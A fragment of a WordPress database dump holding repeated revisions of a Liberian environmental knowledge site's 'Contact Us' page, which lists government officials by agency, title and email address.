\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Henry A. Simpson </strong><br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p><p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel Ballah </strong><br />MGCSP<br /><a href=\"mailto:ballah_@yahoo.com\">ballah_@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-29 09:59:02','2021-03-29 09:59:02','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3648,42,'2021-03-29 09:59:03','2021-03-29 09:59:03','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Henry A. Simpson </strong><br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p><p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel Ballah </strong><br />MGCSP<br /><a href=\"mailto:ballah_@yahoo.com\">ballah_@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-29 09:59:03','2021-03-29 09:59:03','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3649,42,'2021-03-29 09:59:03','2021-03-29 09:59:03','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br 